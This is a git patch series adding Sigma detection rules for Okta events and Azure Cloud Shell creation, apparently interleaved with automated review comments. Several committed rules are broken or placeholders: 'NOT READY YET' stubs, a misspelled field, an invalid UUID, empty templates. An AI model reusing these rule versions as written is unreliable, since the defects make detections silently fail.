 rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml | 1 +
 1 file changed, 1 insertion(+)
 create mode 100644 rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml
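Review bot: The selection keys on `displaymessge`, which is both misspelled and the wrong field for values such as `policy.lifecycle.update`; those are Okta event type names, and the sibling rules in this series put them under `eventtype` (patch 0900 further down this page makes exactly that correction), so as committed the rule would not match anything. Changing or deleting a sign-on/MFA policy is closer to defense evasion than to impact, so `attack.defense_evasion` (already used by a rule on this page) with `attack.t1562` describes it better than `attack.impact`, and `level: low` seems generous for a control that gates authentication. A short description sentence naming the eventtypes matched, e.g. `Detects Okta policy.lifecycle.update and policy.lifecycle.delete events.`, would also make the rule self-explanatory to analysts.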
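Review bot: Committing a one-line placeholder `NOT READY YET` under rules/cloud/okta/ puts a file that is not a Sigma rule into the directory the test suite walks; the test_rules.py changes earlier on this page show the suite reading every rule file's logsource, so these stubs will presumably be reported as faulty, or break parsing, until they are filled in. The same applies to the placeholders created for okta_policy_rule_modified_or_deleted.yml, okta_account_mfa_reset.yml, okta_network_zone_deactivated_or_deleted.yml and okta_user_account_mfa_bypass_attempt.yml in the following patches, and to the `NOT READY YET` line that the later template commits keep as the first line of each file. Keeping work-in-progress rules out of the rules tree until they are complete avoids a broken intermediate state on the branch.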
diff --git a/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml b/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml new file mode 100644 index 00000000..41a74b12 --- /dev/null +++ b/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml @@ -0,0 +1 @@ +NOT READY YET From fefb8564717d69af72ededb4172bc7ec00aac734 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:20:54 -0500 Subject: [PATCH 0896/1367] Create okta_account_mfa_reset.yml --- rules/cloud/okta/okta_account_mfa_reset.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 rules/cloud/okta/okta_account_mfa_reset.yml diff --git a/rules/cloud/okta/okta_account_mfa_reset.yml b/rules/cloud/okta/okta_account_mfa_reset.yml new file mode 100644 index 00000000..41a74b12 --- /dev/null +++ b/rules/cloud/okta/okta_account_mfa_reset.yml @@ -0,0 +1 @@ +NOT READY YET From c51e1db2288c58a7637df6647672c35ae01744cf Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:22:15 -0500 Subject: [PATCH 0897/1367] Create okta_network_zone_deactivated_or_deleted.yml --- rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml diff --git a/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml b/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml new file mode 100644 index 00000000..c3b70785 --- /dev/null +++ b/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml @@ -0,0 +1 @@ +NOT READ YET From d5653cbfd0b7f6fda9467f5a92f1cbf4f90dfdea Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:24:57 -0500 Subject: [PATCH 0898/1367] Create okta_user_account_mfa_bypass_attempt.yml --- rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml 
diff --git a/rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml b/rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml new file mode 100644 index 00000000..41a74b12 --- /dev/null +++ b/rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml @@ -0,0 +1 @@ +NOT READY YET From 1af9120f3771e54bfe753124347255270c8671b2 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:25:11 -0500 Subject: [PATCH 0899/1367] Rename okta_account_mfa_reset.yml to okta_user_account_mfa_reset.yml --- ...okta_account_mfa_reset.yml => okta_user_account_mfa_reset.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/okta/{okta_account_mfa_reset.yml => okta_user_account_mfa_reset.yml} (100%) diff --git a/rules/cloud/okta/okta_account_mfa_reset.yml b/rules/cloud/okta/okta_user_account_mfa_reset.yml similarity index 100% rename from rules/cloud/okta/okta_account_mfa_reset.yml rename to rules/cloud/okta/okta_user_account_mfa_reset.yml From 12e5eeac9ecb3e5d4e2243e9b2c829ca331c609f Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:30:03 -0500 Subject: [PATCH 0900/1367] Update okta_policy_modified_or_deleted.yml --- rules/cloud/okta/okta_policy_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_policy_modified_or_deleted.yml b/rules/cloud/okta/okta_policy_modified_or_deleted.yml index 494af5b5..2e72accd 100644 --- a/rules/cloud/okta/okta_policy_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_policy_modified_or_deleted.yml @@ -11,7 +11,7 @@ logsource: service: okta detection: selection: - displaymessge: + eventtype: - policy.lifecycle.update - policy.lifecycle.delete condition: selection From 8607af29e0f2322d2ae1f2c35841c935c0b1976a Mon Sep 17 00:00:00 2001 
From: Austin Songer
Date: Sun, 12 Sep 2021 19:35:19 -0500
Subject: [PATCH 0901/1367] Create okta_user_account_lockout.yml
---
 .../cloud/okta/okta_user_account_lockout.yml | 20 +++++++++++++++++++
 1 file changed, 20 insertions(+)
 create mode 100644 rules/cloud/okta/okta_user_account_lockout.yml
diff --git a/rules/cloud/okta/okta_user_account_lockout.yml b/rules/cloud/okta/okta_user_account_lockout.yml
new file mode 100644
index 00000000..92fd1081
--- /dev/null
+++ b/rules/cloud/okta/okta_user_account_lockout.yml
@@ -0,0 +1,20 @@
+title: Okta User Account Lock out
+id: 14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a
+description: Detects when an user account is locked out.
+author: Austin Songer
+status: experimental
+date: 2021/09/12
+references:
+ - https://developer.okta.com/docs/reference/api/system-log/
+ - https://developer.okta.com/docs/reference/api/event-types/
+logsource:
+ service: okta
+detection:
+ selection:
+ displaymessage: Max sign in attempts exceeded
+ condition: selection
+level: medium
+tags:
+ - attack.impact
+falsepositives:
+ - Unknown
From 8b0756bd32f7c1ab9da0a0d3b798c3d6806fa649 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sun, 12 Sep 2021 19:39:24 -0500
Subject: [PATCH 0902/1367] Create okta_unauthorized_access_to_app.yml
---
 .../okta/okta_unauthorized_access_to_app.yml | 21 +++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 rules/cloud/okta/okta_unauthorized_access_to_app.yml
diff --git a/rules/cloud/okta/okta_unauthorized_access_to_app.yml b/rules/cloud/okta/okta_unauthorized_access_to_app.yml
new file mode 100644
index 00000000..f0045b70
--- /dev/null
+++ b/rules/cloud/okta/okta_unauthorized_access_to_app.yml
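Review bot: The selection matches the free-text `displaymessage: Max sign in attempts exceeded` rather than the structured event type that the other Okta rules in this series key on; display strings can change between Okta releases, so `eventtype: user.account.lock` is the more stable selector (confirm against the event-types reference the rule already cites). `attack.impact` is also an odd fit for a lockout, which is most often the trace of password guessing; `attack.credential_access` / `attack.t1110` describes it better and helps analysts triage it as a brute-force signal rather than an outage. The title's `Lock out` should be `Lockout` and the description's `an user` should be `a user`.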
@@ -0,0 +1,21 @@
+title: Okta Unauthorized Access to App
+id: 6cc2b61b-d97e-42ef-a9dd-8aa8dc951657
+description: Detects when unauthorized access to app occurs.
+author: Austin Songer
+status: experimental
+date: 2021/09/12
+references:
+ - https://developer.okta.com/docs/reference/api/system-log/
+ - https://developer.okta.com/docs/reference/api/event-types/
+logsource:
+ service: okta
+detection:
+ selection:
+ displaymessage:
+ - User attempted unauthorized access to app
+ condition: selection
+level: medium
+tags:
+ - attack.impact
+falsepositives:
+ - User might of believe that they had access.
From 08e79bb22efe272603fd46a94021d76cb60c4ac5 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sun, 12 Sep 2021 19:40:49 -0500
Subject: [PATCH 0903/1367] Update okta_application_modified_or_deleted.yml
---
 .../okta_application_modified_or_deleted.yml | 28 +++++++++++++++++++
 1 file changed, 28 insertions(+)
diff --git a/rules/cloud/okta/okta_application_modified_or_deleted.yml b/rules/cloud/okta/okta_application_modified_or_deleted.yml
index 41a74b12..ca73d4f7 100644
--- a/rules/cloud/okta/okta_application_modified_or_deleted.yml
+++ b/rules/cloud/okta/okta_application_modified_or_deleted.yml
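Review bot: As with the lockout rule, the selection keys on the human-readable `displaymessage` string instead of the Okta event type; `eventtype: app.generic.unauth_app_access_attempt` is the structured equivalent and survives wording changes in the message (confirm against the cited event-types reference). The false-positive entry `User might of believe that they had access.` should read `User might have believed that they had access.`, and `attack.impact` again does not describe an access-denied event, which is closer to discovery or access-attempt noise than to impact. A single-value list under `displaymessage:` could also be written as a scalar, as okta_user_account_lockout.yml does, for consistency across the series.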
@@ -1 +1,29 @@ NOT READY YET + +title: Okta +id: +description: Detects when an +author: Austin Songer +status: experimental +date: 2021/ +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + service: okta +detection: + selection: + eventtype: + - + - + displaymessage: + - + - + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Okta being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 31ccf89dcc17dfb341eab79bd93cb9b739c805ae Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:41:00 -0500 Subject: [PATCH 0904/1367] Update okta_network_zone_deactivated_or_deleted.yml --- ...ta_network_zone_deactivated_or_deleted.yml | 30 ++++++++++++++++++- 1 file changed, 29 insertions(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml b/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml index c3b70785..ca73d4f7 100644 --- a/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml +++ b/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml 
@@ -1 +1,29 @@ -NOT READ YET +NOT READY YET + +title: Okta +id: +description: Detects when an +author: Austin Songer +status: experimental +date: 2021/ +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + service: okta +detection: + selection: + eventtype: + - + - + displaymessage: + - + - + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Okta being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 30823b72b24c713aa2cd3422e7cbd8ba6442d66a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:41:14 -0500 Subject: [PATCH 0905/1367] Update okta_policy_rule_modified_or_deleted.yml --- .../okta_policy_rule_modified_or_deleted.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml b/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml index 41a74b12..ca73d4f7 100644 --- a/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml 
@@ -1 +1,29 @@ NOT READY YET + +title: Okta +id: +description: Detects when an +author: Austin Songer +status: experimental +date: 2021/ +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + service: okta +detection: + selection: + eventtype: + - + - + displaymessage: + - + - + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Okta being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 4d58194dab1150498272250324a4e6bcdd6023af Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:41:38 -0500 Subject: [PATCH 0906/1367] Update okta_user_account_mfa_bypass_attempt.yml --- .../okta_user_account_mfa_bypass_attempt.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml b/rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml index 41a74b12..ca73d4f7 100644 --- a/rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml +++ b/rules/cloud/okta/okta_user_account_mfa_bypass_attempt.yml 
@@ -1 +1,29 @@ NOT READY YET + +title: Okta +id: +description: Detects when an +author: Austin Songer +status: experimental +date: 2021/ +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + service: okta +detection: + selection: + eventtype: + - + - + displaymessage: + - + - + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Okta being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 7b371621078e2a8b88ed4beae8bec92d8f8a0b2c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:41:50 -0500 Subject: [PATCH 0907/1367] Update okta_user_account_mfa_reset.yml --- .../okta/okta_user_account_mfa_reset.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/rules/cloud/okta/okta_user_account_mfa_reset.yml b/rules/cloud/okta/okta_user_account_mfa_reset.yml index 41a74b12..ca73d4f7 100644 --- a/rules/cloud/okta/okta_user_account_mfa_reset.yml +++ b/rules/cloud/okta/okta_user_account_mfa_reset.yml 
@@ -1 +1,29 @@ NOT READY YET + +title: Okta +id: +description: Detects when an +author: Austin Songer +status: experimental +date: 2021/ +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + service: okta +detection: + selection: + eventtype: + - + - + displaymessage: + - + - + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Okta being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 5f7e657319b016ed14bfacbd329cecfdcf0afad5 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:45:57 -0500 Subject: [PATCH 0908/1367] Create okta_admin_role_assigned_to_user_or_group.yml --- ...a_admin_role_assigned_to_user_or_group.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml diff --git a/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml b/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml new file mode 100644 index 00000000..1ded4c5d --- /dev/null +++ b/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml 
@@ -0,0 +1,23 @@
+title: Okta Admin Role Assigned to an User or Group
+id: 413d4a81-6c98-4479-9863-014785fd579c
+description: Detects when an the Administrator role is assigned to an user or group.
+author: Austin Songer
+status: experimental
+date: 2021/09/12
+references:
+ - https://developer.okta.com/docs/reference/api/system-log/
+ - https://developer.okta.com/docs/reference/api/event-types/
+logsource:
+ service: okta
+detection:
+ selection:
+ eventtype:
+ - group.privilege.grant
+ - user.account.privilege.grant
+ condition: selection
+level: medium
+tags:
+ - attack.impact
+falsepositives:
+ - Administrator roles could be assigned to users or group by other admin users.
+
From 329c5e96fc187376ad74e951fc9e46b8e0a6eb3d Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sun, 12 Sep 2021 19:47:21 -0500
Subject: [PATCH 0909/1367] Create okta_api_token_created.yml
---
 rules/cloud/okta/okta_api_token_created.yml | 30 +++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 rules/cloud/okta/okta_api_token_created.yml
diff --git a/rules/cloud/okta/okta_api_token_created.yml b/rules/cloud/okta/okta_api_token_created.yml
new file mode 100644
index 00000000..dee79262
--- /dev/null
+++ b/rules/cloud/okta/okta_api_token_created.yml
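Review bot: Granting an administrator role is a persistence / privilege-escalation signal, so `attack.impact` undersells it; `attack.persistence` (used by patch 0912 on this page) together with `attack.t1098` would let downstream consumers map the rule correctly, and since admin grants are rare and high-consequence in an identity provider, `level: high` is worth considering over `medium`. The title `Assigned to an User or Group` and the description `Detects when an the Administrator role is assigned to an user or group` should read `a User or Group` and `Detects when the Administrator role is assigned to a user or group`. The false-positive note could name the legitimate path explicitly, e.g. `Role grants performed through an approved change request by existing administrators.`, so analysts know what to compare against.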
@@ -0,0 +1,30 @@ +NOT READY YET + +title: Okta +id: +description: Detects when an +author: Austin Songer +status: experimental +date: 2021/ +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + service: okta +detection: + selection: + eventtype: + - + - + displaymessage: + - + - + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Okta being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + From f2274379203e243034e9cd951b972ac834c519bb Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 19:47:59 -0500 Subject: [PATCH 0910/1367] Create okta_api_token_revoked.yml --- rules/cloud/okta/okta_api_token_revoked.yml | 29 +++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/cloud/okta/okta_api_token_revoked.yml diff --git a/rules/cloud/okta/okta_api_token_revoked.yml b/rules/cloud/okta/okta_api_token_revoked.yml new file mode 100644 index 00000000..ca73d4f7 --- /dev/null +++ b/rules/cloud/okta/okta_api_token_revoked.yml 
@@ -0,0 +1,29 @@ +NOT READY YET + +title: Okta +id: +description: Detects when an +author: Austin Songer +status: experimental +date: 2021/ +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + service: okta +detection: + selection: + eventtype: + - + - + displaymessage: + - + - + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Okta being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 715b6ecddaa6b76c1ef4ef2d2d31d77f59dbca6b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 20:00:08 -0500 Subject: [PATCH 0911/1367] Create azure_new_cloudshell_created.yml --- .../azure/azure_new_cloudshell_created.yml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 rules/cloud/azure/azure_new_cloudshell_created.yml diff --git a/rules/cloud/azure/azure_new_cloudshell_created.yml b/rules/cloud/azure/azure_new_cloudshell_created.yml new file mode 100644 index 00000000..03afa08e --- /dev/null +++ b/rules/cloud/azure/azure_new_cloudshell_created.yml 
@@ -0,0 +1,21 @@
+title: Azure New CloudShell Created
+id: 72af37e2-ec32-47dc-992b-bc288a2708cb
+description: Identifies when a new cloudshell is created inside of Azure portal.
+author: Austin Songer
+status: experimental
+date: 2021/09/21
+references:
+ - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
+logsource:
+ service: azure.activitylogs
+detection:
+ selection:
+ properties.message: MICROSOFT.PORTAL/CONSOLES/WRITE
+ condition: selection
+level: medium
+tags:
+ - attack.execution
+ - attack.t1059
+falsepositives:
+ - A new cloudshell may be created by a system administrator.
+
From aa8978e9da53bfb6ecb8c26442b32398fecbd0e4 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sun, 12 Sep 2021 20:14:27 -0500
Subject: [PATCH 0912/1367] Update okta_api_token_created.yml
---
 rules/cloud/okta/okta_api_token_created.yml | 24 ++++++--------------
 1 file changed, 7 insertions(+), 17 deletions(-)
diff --git a/rules/cloud/okta/okta_api_token_created.yml b/rules/cloud/okta/okta_api_token_created.yml
index dee79262..a4a49a16 100644
--- a/rules/cloud/okta/okta_api_token_created.yml
+++ b/rules/cloud/okta/okta_api_token_created.yml
@@ -1,11 +1,9 @@
-NOT READY YET
-
-title: Okta
-id:
-description: Detects when an
+title: Okta API Token Created
+id: 19951c21-229d-4ccb-8774-b993c3ff3c5c
+description: Detects when a API token is created
 author: Austin Songer
 status: experimental
-date: 2021/
+date: 2021/09/12
 references:
 - https://developer.okta.com/docs/reference/api/system-log/
 - https://developer.okta.com/docs/reference/api/event-types/
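Review bot: `date: 2021/09/21` is later than the commit date in the patch header (Sun, 12 Sep 2021), so it looks like a transposition of `2021/09/12`, the date the sibling Okta rules in this series use. I cannot tell from this page whether `properties.message` is the field that carries the operation name `MICROSOFT.PORTAL/CONSOLES/WRITE` in the repository's azure.activitylogs mapping; please check it against an existing azure.activitylogs rule, because a wrong field name makes the rule silently match nothing. `attack.t1059` is defensible for a Cloud Shell, but the event is the provisioning of the console resource rather than command execution, so a description along the lines of `Identifies creation of an Azure Cloud Shell console (MICROSOFT.PORTAL/CONSOLES/WRITE); commands run in the shell are not covered by this event.` would set analyst expectations correctly.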
@@ -13,18 +11,10 @@ logsource: service: okta detection: selection: - eventtype: - - - - - displaymessage: - - - - + eventtype: system.api_token.create condition: selection level: medium tags: - - attack.impact + - attack.persistence falsepositives: - - Okta being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. - + - Unknown From 9f7033687997142f04c3359edba7be23242d9ec8 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 20:16:37 -0500 Subject: [PATCH 0913/1367] Update okta_api_token_revoked.yml --- rules/cloud/okta/okta_api_token_revoked.yml | 22 +++++++-------------- 1 file changed, 7 insertions(+), 15 deletions(-) diff --git a/rules/cloud/okta/okta_api_token_revoked.yml b/rules/cloud/okta/okta_api_token_revoked.yml index ca73d4f7..76738fb9 100644 --- a/rules/cloud/okta/okta_api_token_revoked.yml +++ b/rules/cloud/okta/okta_api_token_revoked.yml @@ -1,11 +1,9 @@ -NOT READY YET - -title: Okta -id: -description: Detects when an +title: Okta API Token Revoked +id: cf1dbc6b-6205-41b4-9b88-a83980d2255b +description: Detects when a API Token is revoked. author: Austin Songer status: experimental -date: 2021/ +date: 2021/09/12 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ 
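Review bot: `falsepositives: - Unknown` understates how routine API token creation is for an identity provider; integrations and automation create tokens regularly, so something like `Administrators creating API tokens for approved integrations or automation` gives analysts a baseline to compare against, and `level: medium` is reasonable only if that baseline is documented. The description in the preceding hunk of this file, `Detects when a API token is created`, should read `Detects when an API token is created.` for consistency with the other rules' punctuation. The switch to `attack.persistence` in this hunk is the right tactic for a long-lived credential.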
@@ -13,17 +11,11 @@ logsource: service: okta detection: selection: - eventtype: - - - - - displaymessage: - - - - + eventtype: system.api_token.revoke condition: selection level: medium tags: - attack.impact falsepositives: - - Okta being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Unknown + From 45b6ac72eeb1c0cbe38dee923431066b509094e3 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 20:19:57 -0500 Subject: [PATCH 0914/1367] Update okta_application_modified_or_deleted.yml --- .../okta_application_modified_or_deleted.yml | 22 +++++++------------ 1 file changed, 8 insertions(+), 14 deletions(-) diff --git a/rules/cloud/okta/okta_application_modified_or_deleted.yml b/rules/cloud/okta/okta_application_modified_or_deleted.yml index ca73d4f7..63401971 100644 --- a/rules/cloud/okta/okta_application_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_application_modified_or_deleted.yml @@ -1,11 +1,9 @@ -NOT READY YET - -title: Okta -id: -description: Detects when an +title: Okta Application Modified or Deleted +id: 7899144b-e416-4c28-b0b5-ab8f9e0a541d +description: Detects when an application is modified or deleted. author: Austin Songer status: experimental -date: 2021/ +date: 2021/09/12 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ 
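Review bot: `falsepositives: - Unknown` undersells how common `system.api_token.revoke` is: tokens are revoked during routine rotation and on offboarding, and at `level: medium` with no guidance this will page people for hygiene work; suggest `- Tokens are routinely revoked during credential rotation and user offboarding; confirm the actor and the integration the token belonged to.` The retained `attack.impact` tag is defensible (revoking a token that feeds a SIEM or automation is access removal), but it would be clearer with the technique spelled out, e.g. `- attack.t1531`, or paired with `attack.defense_evasion` if the intent is catching an attacker silencing an integration.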
@@ -14,16 +12,12 @@ logsource: detection: selection: eventtype: - - - - - displaymessage: - - - - + - application.lifecycle.update + - application.lifecycle.delete condition: selection level: medium tags: - attack.impact falsepositives: - - Okta being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Unknown + From e60fbbf4b8b0e3b1ab30d3eff915dc397324aaf8 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 20:22:16 -0500 Subject: [PATCH 0915/1367] Update okta_network_zone_deactivated_or_deleted.yml --- ...ta_network_zone_deactivated_or_deleted.yml | 22 +++++++------------ 1 file changed, 8 insertions(+), 14 deletions(-) diff --git a/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml b/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml index ca73d4f7..5d174c95 100644 --- a/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml +++ b/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml @@ -1,11 +1,9 @@ -NOT READY YET - -title: Okta -id: -description: Detects when an +title: Okta Network Zone Deactivated or Deleted +id: 9f308120-69ed-4506-abde-ac6da81f4310 +description: Detects when an Network Zone is Deactivated or Deleted. author: Austin Songer status: experimental -date: 2021/ +date: 2021/09/12 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ 
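Review bot: The selection covers `application.lifecycle.update` and `application.lifecycle.delete` only; in Okta an application is normally deactivated before it can be deleted and that step has its own event type, so if the goal is to catch an app being taken away from users, `- application.lifecycle.deactivate` is worth adding to the list (confirm against the event-types reference the rule cites). `application.lifecycle.update` also fires on ordinary settings changes, so `falsepositives: - Unknown` is too thin for a medium-level rule; name the expected sources, e.g. `- Application settings are routinely changed by Okta administrators and provisioning tooling; verify the actor.`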
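Review bot: `description: Detects when an Network Zone is Deactivated or Deleted.` should be `description: Detects when a network zone is deactivated or deleted.` This is a header-only hunk; the detection block is in the next hunk.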
@@ -14,16 +12,12 @@ logsource: detection: selection: eventtype: - - - - - displaymessage: - - - - + - zone.deactivate + - zone.delete condition: selection level: medium tags: - attack.impact falsepositives: - - Okta being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Okta modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Unknown + From f759fff453f727d93e562e1b40f1f118a928d6d1 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 12 Sep 2021 20:24:12 -0500 Subject: [PATCH 0916/1367] Update okta_policy_rule_modified_or_deleted.yml --- .../okta_policy_rule_modified_or_deleted.yml | 22 +++++++------------ 1 file changed, 8 insertions(+), 14 deletions(-) diff --git a/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml b/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml index ca73d4f7..81cbea62 100644 --- a/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml @@ -1,11 +1,9 @@ -NOT READY YET - -title: Okta -id: -description: Detects when an +title: Okta Policy Rule Modified or Deleted +id: 0c97c1d3-4057-45c9-b148-1de94b631931v +description: Detects when an Policy Rule is Modified or Deleted. author: Austin Songer status: experimental -date: 2021/ +date: 2021/09/12 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ 
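Review bot: `zone.deactivate` and `zone.delete` remove the IP-based restrictions that sign-on policies rely on, so what an attacker gains here is weakened controls rather than damage; `attack.defense_evasion` with `attack.t1562` (Impair Defenses) describes that better than the retained `attack.impact`, or add them alongside it. As with the sibling rules, `- Unknown` under falsepositives should at least say that zone changes are expected from network administrators and that the actor and source IP should be checked.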
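Review bot: The added `id: 0c97c1d3-4057-45c9-b148-1de94b631931v` carries a stray trailing `v` and is not a valid UUID, which breaks tooling that validates rule ids; the fix lands later in this series (PATCH 0923), but it should be correct here. `description: Detects when an Policy Rule is Modified or Deleted.` should also read `description: Detects when a policy rule is modified or deleted.`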
